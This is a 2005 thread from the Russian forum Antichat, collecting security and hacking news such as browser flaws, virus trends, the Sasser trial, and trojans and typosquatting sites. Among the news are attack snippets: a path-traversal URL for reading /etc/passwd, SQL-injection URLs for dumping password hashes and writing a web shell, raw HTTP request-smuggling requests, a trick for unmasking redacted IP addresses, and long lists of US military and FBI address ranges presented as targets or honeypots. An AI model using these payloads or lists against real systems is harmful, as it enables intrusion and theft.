Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Мировые новости (https://forum.antichat.xyz/forumdisplay.php?f=23)
-   -   Безопасность & Хакерство (https://forum.antichat.xyz/showthread.php?t=6992)

k00p3r 08.06.2005 11:27

Безопасность & Хакерство
 
Здесь размещаем новости связанные с компьютерной безопасностью и хакерством.
Все сообщения подобной тематики, вне этой темы будут удаляться.

k00p3r 08.06.2005 13:00

Дыра в Mozilla/Firefox
 
Согласно известной датской компании Secunia в браузерах Mozilla и Firefox обнаружена уязвимость в реализации фреймов,которая потенциально может использоваться с целью кражи конфиденциальной информации пользователя.
Подробности: http://secunia.com/advisories/15601/

DRON-ANARCHY 08.06.2005 23:15

разгул точно наводящихся вирусов
 
Брюс Шнайер, основатель компании Counterpane Internet Security, известнейший специалист по криптографии, опубликовал на своём сайте эссе, посвящённое тенденциям в сфере сетевых рисков.
Не давая никаких особых оценок, Шнайер просто перечисляет ожидаемые сценарии, и будущее выглядит весьма мрачно. По мнению Шнайера, в самом ближайшем времени следует ожидать комплексных червей, способных выполнять целый ряд функций, и в качестве примера предлагает вирус KEG.Spybot, который производит анализ общей уязвимости заражённой системы и отсылает отчёт своему автору через IRC-каналы.
Шнайер предсказывает, что Microsoft Internet Information Services (IIS-сервер) будет ещё долго оставаться излюбленной мишенью для хакеров, хотя по мере того, как всё большее число компаний будут мигрировать на Windows 2003 и IIS 6, количество атак против IIS начнёт снижаться. Пиринговые сети, как полагает Шнайер, станут основным каналом первичного распространения вирусов.
Кроме того, Шнайер ожидает скорого появления многочисленных вирусов "точного наведения". "Недавно мы обнаружили вирусы, которые используют сторонние средства сбора информации, в том числе Google, для углублённой разведки. Это приведёт к более эффективным методам распространения: вместо того чтобы распространяться хаотично, вирусы будут наводиться точно по конкретным целям, - прогнозирует Шнайер. - Благодаря тому, что такие мишени будут определяться с помощью сторонних служб, резко снизится количество "шума", который вирусы обычно производят при случайном выборе мишеней, следовательно срок между появлением и первым обнаружением червя резко увеличится".
Вслед за рядом других специалистов Шнайер указывает, что взломы и DDoS-атаки превращаются в теневой бизнес. Хакеры торгуют информацией об обнаруженных уязвимостях, а те из них, в распоряжении которых имеются "зомби-сети", шантажируют коммерсантов, угрожая DDoS-атаками. Шнайер, впрочем, указывает, что большая часть "наездов" хакеры совершают на периферийных коммерсантов - онлайновые казино, игровые и порноресурсы. И чем чаще от хакеров откупаются, тем больше они наглеют.
Впрочем, Шнайер прогнозирует, что в скором времени хакеры начнут атаковать и финансовые учреждения, поскольку онлайновые криминальные элементы ищут новые источники дохода. "Кроме того, ожидается всё больше "инсайдерских" атак с целью наживы. Уже сейчас большая часть целенаправленных атак производится из сетей самих атакованных организаций. Мы также ожидаем увеличения количества политически мотивированных хакерских атак..." - пишет Шнайер.

Компьюлента

DRON-ANARCHY 08.06.2005 23:19

Покупая смартфон подумайте о безопасности
 
Большинство владельцев смартфонов подозревает о скрытой угрозе вирусов, но не предпринимает никаких мер, чтобы обезопасить свои данные от вредоносных программ. Компания Symantec недавно провела небольшое опрос, среди 300 американских граждан. Из всех опрошенных, 73% сообщили, что знакомы с проблемой и понимают, как происходит распространение вирусов в мобильной среде.
Кроме того, более чем 70% выразили озабоченность по этому поводу, т.к. опасаются за конфиденциальность своей информации. За прошлый год было написано множество вирусов, троянов, в том числе и нашумевший Cabir, как известно, атакующий смартфоны на Symbian OS.
Несмотря на риск потери данных, около 55% ответили, что хранят на своих телефонах личные данные, 37% - деловую информацию и 28% - клиентские данные. Как известно, на смартфоны и коммуникаторы вирусы проникают через Интернет, и, зная это, 64% опрошенных ежедневно работают с электронной корреспонденцией, 56% - используют IM и 46% просто выходят в Интернет. Впрочем, волков бояться, - в лес не ходить...
Интернет - не единственный способ "заразиться", например уже упомянутый Cabir распространяется через Bluetooth. Помимо защиты информации у пользователей появилась еще одна головная боль - "банкинг". 41% активно совершают финансовые расчеты через банковский онлайн сервис. По мнению 57%, пассивная безопасность существующих смартфонов куда ниже ПК, хотя это ошибочное мнение, уверяет Мэт Экрам (Matt Ekram), менеджер отдела безопасности Symantec.

Crime-research

k00p3r 12.06.2005 09:01

bug to [ IkonBoard v2.1.7b]
 
Уязвимость найдена в скрипте topic.cgi в форуме Ikonboard v2.1.7b. Удалённый пользователь может выполнить следующий сценарий и получить например, /etc/passwd:

http://127.0.0.1/topic.cgi?forum=[x]&topic= ../../../../../../../../etc/passwd%00


Так же имеется simple-sploit для эксплуатации бага, который можно взять - http://clkiller.net/release/ikonb217b.rar

Источник: www.ru24-team.net

k00p3r 12.06.2005 09:06

wwwthreads [all versions] - SQL-injection
 
Уязвимость позволяет получить DES-хеш любого пользователя, создать веб-шелл, получить доступ к важной служебной информации. Использование:

Получение хеша пароля:
http://target/viewmessage.php?Cat=&m...om%20w3t_Users where U_Username='admin'

Получение учетных записей к БД:
http://target/viewmessage.php?Cat=&m...m%20mysql.user where User='root'

Создание веб-шелла (при наличии прав на запись):
http://target/viewmessage.php?Cat=&m...б_шелла into outfile 'path_to_file/file.php'

Источник: www.cyberlords.net

k00p3r 13.06.2005 13:44

В интернете появился список Ip-адресов секретных компьютеров США
 
P-адреса ряда компьютеров, принадлежащих американским военным ведомствам, может без особого труда узнать любой желающий. Все, что для этого нужно сделать - загрузить из интернета небольшой файл в формате PDF размером в 300 кб.
(http://news.findlaw.com/hdocs/docs/c...k1102vaind.pdf)
Как сообщает Lenta.ru, файл о котором идет речь, появился на веб-сайте публичной американской правовой базы FindLaw.com в связи с делом тридцатидевятилетнего хакера Гари Маккиннона. Безработный Маккиннон, известный под прозвищем Solo, был арестован несколько дней назад в Лондоне по подозрению в совершении взлома компьютерных сетей Министерства обороны США и NASA.

В 2002 году подозреваемый, предположительно, проник в один из военных компьютеров на базе Форт-Майер в штате Виржиния, уничтожил порядка 1300 пользовательских аккаунтов и важную информацию. Восстановительные работы обошлись правительству почти в миллион долларов. Если вина Маккиннона будет доказана, ему может грозить крупный штраф и тюремное заключение на срок до 70 лет.

Обвинительное заключение против Маккиннона на днях появилось на сайте FindLaw.com. Причем в файле, помимо описания противоправных действий хакера, приведен список IP-адресов компьютеров, которые Маккиннон незаконно взломал, а также список военных баз, к которым эти адреса относятся. Подобная информация, естественно, является закрытой, в связи с чем сами IP-адреса в документе закрашены черным цветом. Тем не менее, если выделить "секретную" таблицу, а затем скопировать ее и вставить, например, в текстовый редактор Microsoft Word, защищенные цифровые последовательности становятся видны.

Понятно, что одно лишь знание IP-адресов не позволит получить беспрепятственный доступ к секретным компьютерам. Однако данная информация может облегчить для хакеров поиск потенциально слабых мест в защите сетей военных ведомств США. Кроме того, любой из этих адресов может быть подвергнут распределенной DoS-атаке.

k00p3r 13.06.2005 18:05

В PDF указанной выше все ip-адреса замазаны....но не отчаивайтесь....просто эти адреса неплохо укрыты от глаз простых смертных - я нашёл способ как их просмотреть.Просто копируете замазаные адреса и вставляете в блокнот, там появятся скрытые от глаз ип-адреса!=)

Rebz 13.06.2005 18:21

Чтобы не ходить вокург да около нате сразу вам списочек. Взято из ЖЖ xblp-а.

ФБР под прицелом :))

207.60.x.x and 207.61.x.x - FBI Linux servers used to trap scanners.

Also:


64.224.*
64.225.*
64.226.*
195.10.*
205.96.* - 205.103.*
207.30.* - 207.120.*
207.60.* - 207.61.*
209.35.*
216.25.* <-- (only to catch scanners)
216.247.* <-- (only to catch scanners)
62.0.0.1 - 62.30.255.255

6.*.*.* - Army Information Systems Center
21.*.*.* - US Defense Information Systems Agency
22.*.*.* - Defense Information Systems Agency
26.*.*.* - Defense Information Systems Agency
29.*.*.* - Defense Information Systems Agency
30.*.*.* - Defense Information Systems Agency
49.*.*.* - Joint Tactical Command
50.*.*.* - Joint Tactical Command
55.*.*.* - Army National Guard Bureau
64.224.*.*
64.225.*.*
64.226.*.*
195.10.*
205.96.* - 205.103.*
207.30.* - 207.120.*
207.60.* - 207.61.*
209.35.*.*
216.25.* <-- (only to catch scanners)
216.247.* <-- (only to catch scanners)
217.6.*.*
155.7.0.0 American Forces Information (NET-AFISHQ-NET1)
155.8.0.0 U.S. ArmyFort Gordon (NET-GORDON-NET5)
155.9.0.0 United States Army Information Systems Command (NET-LWOOD-NET2)
155.74.0.0 PEO STAMIS (NET-CEAP2)
155.75.0.0 US Army Corps of Engineers (NET-CEAP3)
155.76.0.0 PEO STAMIS (NET-CEAP4)
155.77.0.0 PEO STAMIS (NET-CEAP5)
155.78.0.0 PEO STAMIS (NET-CEAP6)
155.79.0.0 US Army Corps of Engineers (NET-CEAP7)
155.80.0.0 PEO STAMIS (NET-CEAP
155.81.0.0 PEO STAMIS (NET-CEAP9)
155.82.0.0 PEO STAMIS (NET-CEAP10)
155.83.0.0 US Army Corps of Enginers (NET-CEAP11)
155.84.0.0 PEO STAMIS (NET-CEAP12)
155.85.0.0 PEO STAMIS (NET-CEAP13)
155.86.0.0 US Army Corps of Engineers (NET-CEAP14)
155.87.0.0 PEO STAMIS (NET-CEAP15)
155.88.0.0 PEO STAMIS (NET-CEAP16)
155.178.0.0 Federal Aviation Administration (NET-FAA)
155.213.0.0 USAISC Fort Benning (NET-FTBENNNET3
155.214.0.0 Director of Information Management (NET-CARSON-TCACC )
155.215.0.0 USAISC-FT DRUM (NET-DRUM-TCACCIS)
155.216.0.0 TCACCIS Project Management Office (NET-FTDIX-TCACCI)
155.217.0.0 Directorate of Information Management (NET- EUSTIS-EMH1)
155.218.0.0 USAISC (NET-WVA-EMH2)
155.219.0.0 DOIM/USAISC Fort Sill (NET-SILL-TCACCIS)
155.220.0.0 USAISC-DOIM (NET-FTKNOX-NET4)
155.221.0.0 USAISC-Ft Ord (NET-FTORD-NET2)
128.47.0.0 Army Communications Electronics Command (NET-TACTNET)
128.50.0.0 Department of Defense (NET-COINS)
128.51.0.0 Department of Defense (NET-COINSTNET)
128.56.0.0 U.S. Naval Academy (NET-USNA-NET)
128.63.0.0 Army Ballistics Research Laboratory (NET-BRL-SUBNET)
128.80.0.0 Army Communications Electronics Command (CECOM) (NET-CECOMNET)
128.98.0.0 - 128.98.255.255 Defence Evaluation and Research Agency (NET-DERA-UK)
128.154.0.0 NASA Wallops Flight Facility (NET-WFF-NET)
128.155.0.0 NASA Langley Research Center (NET-LARC-NET)
128.156.0.0 NASA Lewis Network Control Center (NET- LERC)
128.157.0.0 NASA Johnson Space Center (NET-JSC-NET)
128.158.0.0 NASA Ames Research Center (NET-MSFC-NET)
128.159.0.0 NASA Ames Research Center (NET-KSC-NET)
128.160.0.0 Naval Research Laboratory (NET- SSCNET)
128.161.0.0 NASA Ames Research Center (NET-NSN-NET)
128.183.0.0 NASA Goddard Space Flight Center (NET-GSFC)
128.216.0.0 MacDill Air Force Base (NET-CC-PRNET)
128.217.0.0 NASA Kennedy Space Center (NET-NASA-KSC-OIS)
128.236.0.0 U.S. Air Force Academy (NET-USAFA-NET)

207.60-61.*.* : FBI Linux servers used to trap scanners
62.0-30.*.* :
64.224.*.* :
64.225.*.* :
64.226.*.* :
195.10.* :
205.96-103.* :
207.30-120.* :
207.60-61.* :
209.35.*.* :
216.25.* : (only to catch scanners)
216.247.* : (only to catch scanners)
217.6.*.* :
155.7.*.* : American Forces Information (NET-AFISHQ-NET1)
155.8.*.* : U.S. ArmyFort Gordon (NET-GORDON-NET5)
155.9.*.* : United States Army Information Systems Command (NET-LWOOD-NET2)
155.74.*.* : PEO STAMIS (NET-CEAP2)
155.75.*.* : US Army Corps of Engineers (NET-CEAP3)
155.76.*.* : PEO STAMIS (NET-CEAP4)
155.77.*.* : PEO STAMIS (NET-CEAP5)
155.78.*.* : PEO STAMIS (NET-CEAP6)
155.79.*.* : US Army Corps of Engineers (NET-CEAP7)
155.80.*.* : PEO STAMIS (NET-CEAP
155.81.*.* : PEO STAMIS (NET-CEAP9)
155.82.*.* : PEO STAMIS (NET-CEAP10)
155.83.*.* : US Army Corps of Enginers (NET-CEAP11)
155.84.*.* : PEO STAMIS (NET-CEAP12)
155.85.*.* : PEO STAMIS (NET-CEAP13)
155.86.*.* : US Army Corps of Engineers (NET-CEAP14)
155.87.*.* : PEO STAMIS (NET-CEAP15)
155.88.*.* : PEO STAMIS (NET-CEAP16)
155.178.*.* : Federal Aviation Administration (NET-FAA)
155.213.*.* : USAISC Fort Benning (NET-FTBENNNET3
155.214.*.* : Director of Information Management (NET-CARSON-TCACC )
155.215.*.* : USAISC-FT DRUM (NET-DRUM-TCACCIS)
155.216.*.* : TCACCIS Project Management Office (NET-FTDIX-TCACCI)
155.217.*.* : Directorate of Information Management (NET- EUSTIS-EMH1)
155.218.*.* : USAISC (NET-WVA-EMH2)
155.219.*.* : DOIM/USAISC Fort Sill (NET-SILL-TCACCIS)
155.220.*.* : USAISC-DOIM (NET-FTKNOX-NET4)
155.221.*.* : USAISC-Ft Ord (NET-FTORD-NET2)
128.47.*.* : Army Communications Electronics Command (NET-TACTNET)
128.50.*.* : Department of Defense (NET-COINS)
128.51.*.* : Department of Defense (NET-COINSTNET)
128.56.*.* : U.S. Naval Academy (NET-USNA-NET)
128.63.*.* : Army Ballistics Research Laboratory (NET-BRL-SUBNET)
128.80.*.* : Army Communications Electronics Command (CECOM) (NET-CECOMNET)
128.98.*.* : Defence Evaluation and Research Agency (NET-DERA-UK)
128.154.*.* : NASA Wallops Flight Facility (NET-WFF-NET)
128.155.*.* : NASA Langley Research Center (NET-LARC-NET)
128.156.*.* : NASA Lewis Network Control Center (NET- LERC)
128.157.*.* : NASA Johnson Space Center (NET-JSC-NET)
128.158.*.* : NASA Ames Research Center (NET-MSFC-NET)
128.159.*.* : NASA Ames Research Center (NET-KSC-NET)
128.160.*.* : Naval Research Laboratory (NET- SSCNET)
128.161.*.* : NASA Ames Research Center (NET-NSN-NET)
128.183.*.* : NASA Goddard Space Flight Center (NET-GSFC)
128.216.*.* : MacDill Air Force Base (NET-CC-PRNET)
128.217.*.* : NASA Kennedy Space Center (NET-NASA-KSC-OIS)
128.236.*.* : U.S. Air Force Academy (NET-USAFA-NET

207.60-61.*.* : FBI Linux servers used to trap scanners
6.*.*.* : Army Information Systems Center
21.*.*.* : US Defense Information Systems Agency
6.*.*.* : Army Information Systems Center
21.*.*.* : US Defense Information Systems Agency
22.*.*.* : Defense Information Systems Agency
26.*.*.* : Defense Information Systems Agency
29.*.*.* : Defense Information Systems Agency
30.*.*.* : Defense Information Systems Agency
49.*.*.* : Joint Tactical Command
50.*.*.* : Joint Tactical Command
55.*.*.* : Army National Guard Bureau
22.*.*.* : Defense Information Systems Agency
26.*.*.* : Defense Information Systems Agency
29.*.*.* : Defense Information Systems Agency
30.*.*.* : Defense Information Systems Agency
49.*.*.* : Joint Tactical Command
50.*.*.* : Joint Tactical Command
55.*.*.* : Army National Guard Bureau
62.0-30.*.* :
64.224.*.* :
64.225.*.* :
64.226.*.* :
195.10.* :
205.96-103.* :
207.30-120.* :
207.60-61.* :
209.35.*.* :
216.25.* : (only to catch scanners)
216.247.* : (only to catch scanners)
217.6.*.* :
207.60.2.128 - 207.60.2.255 Abacus Technology (NETBLK-TIAC-ABACUSTC)
64.224.* : (FBI's honeypot)
64.225.* : (FBI's honeypot)
64.226.* : (FBI's honeypot)
195.10.* : (FBI's honeypot)
205.96-103.* : (FBI's honeypot)
207.30-120.* : (FBI's honeypot)
207.60-61.* : (FBI's honeypot)
209.35.* : (FBI's honeypot)
216.25.* : (FBI's honeypot)
216.247.* : (FBI's honeypot)
212.159.40.211 : (FBI's honeypot)
212.159.41.173 : (FBI's honeypot)
212.159.0.2 : (FBI's honeypot)
212.159.1.1 : (FBI's honeypot)
212.159.1.4 : (FBI's honeypot)
212.159.1.5 : (FBI's honeypot)
212.56.107.22 : (FBI's honeypot)
212.159.0.2 : (FBI's honeypot)
212.159.33.56 : (FBI's honeypot)
212.56.107.22 : (FBI's honeypot)
139.142.*.* : 139.142.153.23

k00p3r 16.06.2005 17:52

Новая техника Http атак
 
Группа исследователей опубликовала документ описывающий новый вид атаки - "HTTP Request Smuggling" (HRS), направленный на подмену страниц в кеше прокси серверов и обход блокировок контент фильтров и фаерволов.

Идея метода - компоновка нескольких POST/GET запросов в рамках одного HTTP обращения, например:


1 POST http://SITE/foobar.html HTTP/1.1
2 Host: SITE
3 Connection: Keep-Alive
4 Content-Type: application/x-www-form-urlencoded
5 Content-Length: 0
6 Content-Length: 44
7 [CRLF]
8 GET /poison.html HTTP/1.1
9 Host: SITE
10 Bla: [space after the "Bla:", but no CRLF]
11 GET http://SITE/page_to_poison.html HTTP/1.1
12 Host: SITE
13 Connection: Keep-Alive
14 [CRLF]

Пример 2:

1 POST /some_script.jsp HTTP/1.0
2 Connection: Keep-Alive
3 Content-Type: application/x-www-form-urlencoded
4 Content-Length: 9
5 Content-Length: 204
6
7 this=thatPOST /vuln_page.jsp HTTP/1.0
8 Content-Type: application/x-www-form-urlencoded
9 Content-Length: 95
10
11 param1=value1&data=alert("stealing...


Сообщается, что проблеме подвержены Tomcat, squid (исправлено в Squid-2.5.STABLE9), apache (mod_proxy ?) и т.д.


http://www.watchfire.com/resources/

777 29.06.2005 20:58

Во всех распространенных браузерах найдена уязвимость

Проблема связана с тем, что браузер открывает диалоговые окна, не указывая источник их создания. Это позволяет сформировать вредоносную веб-страницу, которая после загрузки выведен на экран дополнительное диалоговое окно от имени какого-либо известного ресурса, например, онлайновой платежной системы или банка. Таким образом, нападающий может похитить пароль, номер счета и другую персональную информацию о жертве.
Ситуация ухудшается тем, что брешь присутствует во всех распространенных браузерах последних версий, в том числе Internet Explorer 5.х/6.х, Firefox 1.х, Mozilla 1.7.х, Opera 8.х и Safari 1.х. Норвежская компания Opera уже устранила уязвимость, выпустив новую версию одноименного браузера с индексом 8.01. Загрузить установочный файл программы можно http://www.opera.com/download/ Пользователям других браузеров датская компания Secunia рекомендует не посещать неизвестные веб-сайты, ссылки на которые могут распространяться через интернет-пейджеры и посредством электронной почты. Заплаток для Internet Explorer, Firefox, Mozilla и Safari в настоящее время не существует.

w00d 11.07.2005 11:21

За вирусы не сажают
 
В пятницу германский суд приговорил молодого человека, обвиняемого в создании прошлогоднего компьютерного червя Sasser, к одному году и девяти месяцам тюрьмы условно.

Кроме того, в постановлении суда Вердена говорится, что 19-летний Свен Яшан должен в период трехлетнего испытательного срока отработать 30 часов на общественных работах в доме для престарелых или в больнице.

Яшан признан виновным по четырем статьям за подмену данных и трем статьям за компьютерный саботаж. Это обвинение стало одним из нескольких успешных процессов над вирусмейкерами. Обычно правоохранительные органы плохо справляются с задачей выслеживания и поимки авторов злокачественного кода.

В ходе данного процесса Яшан признал свою вину в манипуляциях с данными, компьютерном саботаже и создании помех работе компаний. Суд начался во вторник и закончился в пятницу. Он проходил за закрытыми дверьми, так как Яшан на момент совершения преступления был несовершеннолетним.

Червь Sasser и шесть его известных вариантов начали распространяться в мае 2004 года и заразили сотни тысяч компьютеров с операционной системой Windows. Sasser использовал ошибку в Windows 2000 и Windows XP и приводил к сбою и перезагрузке ПК.

Условный приговор был ожидаемым. Прокуроры требовали двухлетнего условного приговора с трехлетним испытательным сроком, а защита добивалась условного приговора в один год.

Следствие доказало, что юноша тщательно спланирован запуск червя Sasser и выпускал его варианты, способные распространяться быстрее, добиваясь максимального ущерба. Ущерб был огромным, и в процессе следствия его удалось установить лишь частично.

И все же действия Яшана были признаны типичными для такого рода трудных, замкнутых подростков и не имеющими своей целью коммерческое обогащение. Суд решил, что Яшан создал червя для того, чтобы завоевать признание со стороны своих сверстников.

Яшан, проживающий в городке Ваффенсен (в Нижней Саксонии), был арестован в мае прошлого года после того, как Microsoft получила сведения от информатора, претендующего на награду в $250 тыс. Дело Sasser пока остается единственным успехом программы Microsoft Anti-Virus Reward, объявленной в ноябре 2003 года. Компания предлагает в общей сложности $1 млн информаторам, которые помогут властям задержать виновников четырех крупнейших эпидемий червей и вирусов, включая Sasser, и ассигновала на будущие награды еще $4 млн.

Microsoft не раскрыла информаторов по делу Sasser, но в пятницу софтверный гигант сообщил, что призовые деньги будут выплачены двум людям, которые помогли установить автора червя. Они получат по $250 тыс. «Сотрудничество с правоохранительными органами и их поддержка в данном случае — важное и благородное дело, — говорится в заявлении главного юрисконсульта Microsoft Нэнси Андерсон. — Мы рады вручить денежный приз тем, кто предоставил достоверную информацию, которая помогла правоохранительным органам Германии».

По правилам программы информаторами не могут быть участники преступления, а их информация должна привести к осуждению подозреваемого. Согласно веб-сайту Microsoft, награда в $250 тыс. все еще ждет тех, кто поможет арестовать и осудить виновных в выпуске на волю червя MyDoom.B, вируса Sobig и червя MSBlast.A, или Blaster.


Источник:Zdnet

w00d 11.07.2005 14:35

В Microsoft переоценивают защищенность компьютеров
 
Старший советник по безопасности Microsoft Детлеф Экерт (Detlef Eckert) заявил на конференции TechEd, организованной корпорацией в Амстердаме, что пользователи стали более осведомленными в вопросе защиты своих компьютеров.

"Хотя интенсивность атак не спадает и сетевые черви все еще представляют опасность, общество пользователей в большинстве своем изменилось в лучшую сторону. Мы видим смену направления атак профессиональных преступников. Они стали более направленными и нацеленными на решение вопроса «как получить деньги?» Они занимаются фишерством для получения банковских реквизитов, шпионажем, использующим троянцев или ботнеты для атак «отказ в обслуживании», — сказал Экерт.

Однако менеджер по продуктам ИТ-безопасности Microsoft Марио Хуарес (Mario Juarez) считает, что уровень пользования все еще недостаточно высок. В США только треть пользователей Windows XP установила Service Pack — последнее обновление с заплатками на множество уязвимостей.

Недавно Microsoft завершила поглощение антивирусной компании Sybari и запустила сервис по удалению шпионских программ, на который подписались 20 млн. человек. Некоторые элементы сервиса предоставляются бесплатно, но, как сказал Экерт, антивирус будет продаваться. Microsoft готова бесплатно закрывать уязвимости в своей системе, но вирусы — это нечто не относящееся к ее ошибкам, сказал Экерт.

Однако Грэм Клули (Graham Cluley), эксперт по антивирусам из компании ИТ-безопасности Sophos, не согласен с этим. На прошлой неделе он назвал Windows одной из величайших проблем в антивирусном мире. «Я уверен, что сейчас настоящая угроза кроется в компьютерах и серверах с Windows. В прошлом месяце мы увидели еще больше вредоносного ПО, и большая его часть нацелена на Windows. Существует один шанс из двух, что компьютер может заразиться всего спустя 12 минут после подключения к широкополосной сети», — сказал он.

У Хуареса спросили, корректно ли продавать антивирус, который устраняет вирусы, использующие уязвимости Windows. Он ответил: «Это философский вопрос».

Источник:Cnews

w00d 11.07.2005 14:41

Лондонская полиция ищет инвестиции для борьбы с хакерами
 
Дополнительное финансирование со стороны частного капитала в размере 1 миллиона фунтов в год позволит вдвое увеличить число раскрываемых в Великобритании компьютерных преступлений. С таким заявлением выступила глава управления лондонской полиции по борьбе с компьютерными преступлениями (CCU) Чарли Макмерди (Charlie McMurdie), сообщает сайт viruslist.com.

Макмерди обратилась к лондонским компаниям с просьбой дополнительно профинансировать свое управление и таким образом привлечь в его ряды 10 новых сотрудников. Преступления в сфере высоких технологий ежегодно обходятся Великобритании в 2,4 миллиарда фунтов. При этом 70 процентов всех преступлений, влияющих на британскую экономику, приходится на Лондон.

Основной целью организованных преступных групп является Сити. По мнению Макмерди, до 80 процентов преступлений при этом совершаются с применением компьютерной техники. Глава CCU утверждает, что ее управление имеет всемирную известность и успешную историю борьбы с хакерами и онлайн-мошенниками. Однако усилий 10 сотрудников CCU для успешного выполнения всех задач в настоящее время уже не хватает. «Это небольшая команда, которая может видеть лишь верхушку айсберга в ходе расследований. Мы не идем в ногу с развитием компьютерных технологий. Нам нужно действовать вместе и двигаться значительно быстрей, чем мы это делаем сейчас или мы останемся позади», — отметила Макмерди. Глава CCU убеждена, что частные инвестиции позволят ее команде действовать активнее и проводить превентивную политику удачнее.

Директор торговой ассоциации в области высоких технологий Intellect Ник Калисперас (Nick Kalisperas) полагает, что IT-индустрия должна положительно отреагиаровать на возможность сближения с полицией. «Дело не только в деньгах, но и в обмене знаниями и опытом», — полагает Калисперас. В свою очередь Макмерди полагает, что необходимые CCU инвестиции обязательно окупятся для структур, наиболее сильно страдающих от электронных преступлений.


http://www.securitylab.ru/

w00d 12.07.2005 11:37

Серия новых троянов спекулирует на Лондонской трагедии
 
Злоумышленники в интернете не преминули воспользоваться повышенным интересом мировой общественности к взрывам в Лондоне и устроили широкомасштабную рассылку троянских программ.

В интернете обнаружена троянская программа, которая использует интерес людей к взрывам в Лондоне, унесшим жизни, по крайней мере, 49 человек.

Пользователям рассылается электронное письмо со ссылкой на любительскую видеосъемку последствий взрыва бомбы в столичной подземке. При попытке открыть вложенный в письмо файл на компьютер устанавливается программа-троян.

При запуске вложение копируется в файл /Windir/winlog.exe и изменяет раздел реестра HKLM/Software/microsoft/Windows/CurrentVersion/Run таким образом, чтобы оно автоматически выполнялось каждый раз во время загрузки Windows. Затем троян пользуется зараженным компьютером и серверами SMTP для рассылки огромного количества спама.

Согласно информации английской компании MessageLabs, занимающейся проблемами сетевой безопасности, данное письмо — это фальшивый новостной html-бюллетень с темой «TERROR HITS LONDON» — «Террор обрушивается на Лондон».

В электронном письме пользователям предлагается «просмотреть уникальные кадры из любительской видеосъемки». Файл называется «London Terror Moovie.avi» и выглядит как обычный видеоклип, однако на самом деле имеет расширение .exe, отделенное от ложного 124 пробелами. Кроме того, для маскировки также сообщается, что файл «проверен антивирусом Norton Antivirus.exe».

Мошенники не удосужились даже вставить в графу «отправитель» реальный адрес CNN. Вместо этого они указали адрес breakingnews@CNNonline.com, который принадлежит не CNN, а некоей компании во Флориде. Однако далеко не все пользователи об этом догадались, многие запустили файл.

Это самый свежий случай нездорового социального инжиниринга, основанного на использовании вирусописателями трагических событий в своих целях. Мошенники часто упаковывают вирус в привлекательную для любопытствующих обложку в то время, когда происходят тревожные инциденты. Аналогичными попытками сопровождались война в Ираке, уничтожение небоскребов в Нью-Йорке 11 сентября и цунами в Азии.

Источник:CNews.ru

w00d 12.07.2005 11:41

1,5 года за продажу и установку нелицензионного ПО
 
Житель Томской области приговорен к 1,5 годам лишения свободы условно за компьютерное пиратство. Как сообщили РБК в Управлении информации и общественных связей Генеральной прокуратуры РФ, Александр Светличный был признан виновным в нарушении авторских прав и неправомерном доступе к компьютерной информации. Следствие установило, что Светличный в нарушение порядка, предусмотренного законом, приобрел, взломал и распространял за деньги путем копирования программный продукт, предназначенный для профессионального проектирования мебели. Стоимость лицензионного экземпляра этой программы превышает 50 тыс. руб. В ходе расследования уголовного дела установлен и подтвержден, в частности, факт модификации программы при помощи специфического электронного ключа, который позволил хакеру бесплатно пользоваться компьютерным средством проектирования, имеющим несколько степеней защиты. Светличный был признан виновным по ст.146 (нарушение авторских прав) и ст.272 (неправомерный доступ к компьютерной информации) Уголовного кодекса РФ. Ему назначено наказание в виде 1 года 6 месяцев лишения свободы условно с испытательным сроком 6 месяцев, отметили в прокуратуре.

Источник:rbc.ru

w00d 12.07.2005 11:44

Google отобрал домены у российского киберсквотера
 
Мошенник из Петербурга зарегистрировал целый ряд доменных имен, в которых слово «google» было написано с опечаткой. Невнимательные пользователи заходили на эти сайты и заражались вирусами.

Дело о «тайпсквоттинге» появилось на свет несколько месяцев назад — 26 апреля 2005 г. антивирусная компания F-Secure сообщила об обнаружении веб-сайта, который заманивает пользователей, с опечаткой набравших название популярного поискового сайта Google.com. Если пользователь ошибся всего в одной букве, то его компьютер сразу же подвергался атаке. Автоматически скачивались и устанавливались несколько троянов, а также шпионские файлы рекламных сетей. Сайт был зарегистрирован на некоего Сергея Гридасова, жителя Санкт-Петербурга, а несколько вредоносных файлов, которые скачиваются на компьютер пользователя, содержали русскоязычный текст.

Естественно, такая наглость со стороны бывших соотечественников не осталась без внимания руководства компании Google, так что 11 мая 2005 г. они подали иск в специально созданную для таких случаев общественную организацию — Национальный арбитражный форум, где решаются спорные вопросы о доменных именах. В этом случае решался вопрос о четырех доменах, которые зарегистрировал «тайпсквоттер» — googkle.com, ghoogle.com, gfoogle.com и gooigle.com.

В ходе рассмотрения дела было установлено, что Сергей Гридасов зарегистрировал домены в декабре 2000 г. и январе 2001 г., тогда как компания Google зарегистрировала свой домен в конце 1999 г. Гридасов использовал свой сайты для редиректа на другие сайты, где компьютеры заражались вредоносным ПО, а содержание ресурсов не имело ничего общего с Google.

Жителю Санкт-Петербурга было направлено уведомление о рассмотрении его дела, но ответа не пришло. Таким образом, он ничего не смог ответить на выдвинутые против него обвинения. Национальный арбитражный форум принял решение, установив, что Гридасов не имеет юридических прав на четыре вышеупомянутых домена, а их названия можно спутать с Google — зарегистрированной торговой маркой, что вводит в заблуждение пользователей. Таким образом. жителя Петербурга лишили сайтов, которые он зарегистрировал четыре с половиной года назад. Наверняка, он уже успел достаточно на них заработать, чтобы не жалеть о потере.

Национальный арбитражный форум и другие аналогичные организации ежегодно рассматривают несколько тысяч подобных дел, руководствуясь единым регламентом UDRP (Uniform Domain Name Dispute Resolution Policy), вступившим в силу в декабре 1999 г. Среди этих дел постоянно фигурируют ответчики из России, поэтому дело Гридасова не является чем-то экстраординарным.

Источник:webplanet.ru

w00d 13.07.2005 10:06

США упрощают поиск похитителей идентификационных данных
 
Центр помощи пострадавшим от кражи идентификационных данных готов предоставлять данные Федеральной комиссии США по торговле (FTC), чтобы упростить поиск похитителей персональных сведений о пользователях компьютерных сетей.

FTC будет размещать полученные сведения в своей клиентской базе данных, доступ к которой имеют более 1300 федеральных и локальных отделений правоохранительных структур, сообщает сайт Security Pipeline. База данных FTC используется как источник информации в рамках расследований дел о хищении идентификационных данных, заявляют представители ФБР.

Центр помощи пострадавшим от кражи идентификационных данных финансируется банками. Служащие центра помогают пострадавшим от краж получать доступ к своим кредитным отчетам, извещать о преступлениях кредитные бюро и уведомлять компании о том, что в их клиентских рядах появляются люди с чужими кредитными картами. В ходе первого года своей работы Центр помощи пострадавшим от кражи идентификационных данных помог 2000 потерпевших.

w00d 13.07.2005 10:08

